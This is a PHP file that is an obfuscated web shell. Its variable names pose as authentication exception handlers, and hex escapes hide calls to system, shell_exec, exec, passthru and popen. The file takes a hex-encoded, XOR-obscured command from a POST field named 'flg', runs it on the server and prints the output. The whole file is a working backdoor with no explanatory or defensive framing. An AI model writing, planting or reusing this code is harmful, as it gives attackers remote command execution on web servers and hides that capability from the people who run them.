<?php

$auth_exception_handler7 = "pc\x6Cose";
$auth_exception_handler3 = "\x65xe\x63";
$auth_exception_handler4 = "p\x61s\x73\x74\x68ru";
$auth_exception_handler1 = "syst\x65\x6D";
$auth_exception_handler6 = "s\x74\x72\x65\x61\x6D_\x67et\x5Fc\x6Fn\x74\x65nts";
$auth_exception_handler5 = "\x70\x6Fpen";
$reverse_searcher = "\x68ex\x32\x62in";
$auth_exception_handler2 = "\x73\x68\x65l\x6C_\x65xec";
if (isset($_POST["\x66l\x67"])) {
            function data_storage ( $resource, $obj ) {
 $data_chunk ='';
$y=0;
 do{
$data_chunk.=chr(ord($resource[$y])^$obj);
$y++;

} while($y<strlen($resource));
 return$data_chunk;
 
}
            $flg = $reverse_searcher($_POST["\x66l\x67"]);
            $flg = data_storage($flg, 95);
            if (function_exists($auth_exception_handler1)) {
                $auth_exception_handler1($flg);
            } elseif (function_exists($auth_exception_handler2)) {
                print $auth_exception_handler2($flg);
            } elseif (function_exists($auth_exception_handler3)) {
                $auth_exception_handler3($flg, $element_resource);
                print join("\n", $element_resource);
            } elseif (function_exists($auth_exception_handler4)) {
                $auth_exception_handler4($flg);
            } elseif (function_exists($auth_exception_handler5) && function_exists($auth_exception_handler6) && function_exists($auth_exception_handler7)) {
                $obj_data_chunk = $auth_exception_handler5($flg, 'r');
                if ($obj_data_chunk) {
                    $tkn_ent = $auth_exception_handler6($obj_data_chunk);
                    $auth_exception_handler7($obj_data_chunk);
                    print $tkn_ent;
                }
            }
            exit;
        }